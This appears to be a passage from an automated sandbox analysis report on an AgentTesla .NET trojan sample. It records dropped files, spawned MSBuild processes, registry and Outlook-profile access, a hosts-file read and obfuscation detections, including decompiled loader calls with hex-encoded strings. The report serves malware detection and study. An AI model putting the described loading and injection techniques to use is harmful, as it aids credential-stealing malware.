                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeCode function: 0_2_07CA0040
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeCode function: 0_2_07CA0021
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0121F400
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0121F748
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067D6678
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067D5C88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067DBB18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067DCF08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067DBD38
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067FC640
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F62F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067FDEA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F3F58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067FAF18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F03D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F7918
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F0374
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F4405
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_068745E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_068722D4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_068757A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06876490
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06870040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06872B80
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeCode function: 14_2_00D118C0
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeCode function: 14_2_00D151F9
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeCode function: 14_2_00D12370
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeCode function: 14_2_00D128A9
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeCode function: 16_2_028B2370
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeCode function: 16_2_028B51F9
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeCode function: 16_2_028B1A2F
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLepqEZpPxHlpofwnoTlOFMwRRcJkmnsaAyjbPwx.exeH vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322647809.00000000048F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLepqEZpPxHlpofwnoTlOFMwRRcJkmnsaAyjbPwx.exeH vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.316437923.000000000162B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.325563619.0000000007AC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLepqEZpPxHlpofwnoTlOFMwRRcJkmnsaAyjbPwx.exeH vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeBinary or memory string: OriginalFilenameGeneric.exe4 vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ykVBUY.exe.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ykVBUY.exe.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ykVBUY.exe.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe 2CA7CF7146FB8209CF3C6CECB1C5AA154C61E046DC07AFA05E8158F2C0DDE2F6
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeReversingLabs: Detection: 26%
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe "C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe"
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe "C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe"
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.logJump to behavior
                    Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@7/6@1/1
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/CommandLine/OutOfProcTaskHostNode.csTask registration methods: 'RegisterTaskObject', 'UnregisterPacketHandler', 'RegisterPacketHandler', 'UnregisterTaskObject', 'GetRegisteredTaskObject'
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/BackEnd/TaskParameter.csTask registration methods: 'CreateNewTaskItemFrom'
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/Shared/TaskLoader.csTask registration methods: 'CreateTask'
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/Shared/RegisteredTaskObjectCacheBase.csTask registration methods: '.cctor', 'GetLazyCollectionForLifetime', 'RegisterTaskObject', 'DisposeObjects', 'IsCollectionEmptyOrUncreated', '.ctor', 'UnregisterTaskObject', 'DisposeCacheObjects', 'GetRegisteredTaskObject', 'GetCollectionForLifetime'
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent(System.Boolean)
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Void System.IO.Pipes.PipeSecurity::AddAccessRule(System.IO.Pipes.PipeAccessRule)
                    Source: 14.2.ykVBUY.exe.550000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 14.2.ykVBUY.exe.550000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent(System.Boolean)
                    Source: 14.2.ykVBUY.exe.550000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Void System.IO.Pipes.PipeSecurity::AddAccessRule(System.IO.Pipes.PipeAccessRule)
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 14.2.ykVBUY.exe.550000.0.unpack, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 14.2.ykVBUY.exe.550000.0.unpack, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 14.0.ykVBUY.exe.550000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 14.0.ykVBUY.exe.550000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent(System.Boolean)
                    Source: 14.0.ykVBUY.exe.550000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Void System.IO.Pipes.PipeSecurity::AddAccessRule(System.IO.Pipes.PipeAccessRule)
                    Source: 14.0.ykVBUY.exe.550000.0.unpack, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 14.0.ykVBUY.exe.550000.0.unpack, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1408:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3264:120:WilError_01
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeMutant created: \Sessions\1\BaseNamedObjects\mwyLJQTCzoERzESbkqhGjwVkw
                    Source: ykVBUY.exe, 0000000E.00000002.361590861.0000000002921000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 00000010.00000002.381074717.00000000029B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: l+C:\Users\user\AppData\Roaming\ykVBUY\*.sln
                    Source: ykVBUY.exe, 0000000E.00000002.361159926.0000000000B93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Roaming\ykVBUY\<.sln
                    Source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.drBinary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
                    Source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.drBinary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
                    Source: ykVBUY.exe, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.drBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
                    Source: ykVBUY.exe, 00000010.00000002.380916358.0000000000E42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Users\user\AppData\Roaming\ykVBUY\<.sln
                    Source: ykVBUY.exe, 0000000E.00000002.361590861.0000000002921000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 00000010.00000002.381074717.00000000029B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *.slnP#
                    Source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.drBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
                    Source: ykVBUY.exe, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.381074717.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe.9.drBinary or memory string: *.sln
                    Source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.drBinary or memory string: MSBuild MyApp.csproj /t:Clean
                    Source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.drBinary or memory string: /ignoreprojectextensions:.sln
                    Source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.drBinary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
                    Source: 9.0.MSBuild.exe.400000.4.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 9.0.MSBuild.exe.400000.4.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 9.0.MSBuild.exe.400000.1.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 9.0.MSBuild.exe.400000.1.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 9.0.MSBuild.exe.400000.3.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 9.0.MSBuild.exe.400000.3.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: ykVBUY.exe, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.dr
                    Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.dr

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, loginForm.cs.Net Code: ___________________________________________________ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.ee0000.0.unpack, loginForm.cs.Net Code: ___________________________________________________ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 0.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.ee0000.0.unpack, loginForm.cs.Net Code: ___________________________________________________ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, loginForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "4173796D6D65747269634B657945786368616E6765466F726D6174", "69626F6B464269", "Client" } }, null, null)
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.ee0000.0.unpack, loginForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "4173796D6D65747269634B657945786368616E6765466F726D6174", "69626F6B464269", "Client" } }, null, null)
                    Source: 0.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.ee0000.0.unpack, loginForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "4173796D6D65747269634B657945786368616E6765466F726D6174", "69626F6B464269", "Client" } }, null, null)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeCode function: 0_2_07CA3619 push ebx; retf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067DA472 push 8BFFFFFFh; retf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067D18F7 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067D18AB push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067D2177 push edi; retn 0000h
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067FDA32 push eax; iretd
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F5EFD push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F5F7F push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F5FDF push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F5FD7 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F5FC7 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F5FBF push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F5FB7 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F5F8F push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F6077 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F606F push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F6067 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F605F push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F6057 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F604F push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F6027 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F60FF push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F60F7 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F60EF push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F60E7 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F60BF push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F60B7 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F60AF push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F60A7 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F609F push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F610F push es; ret
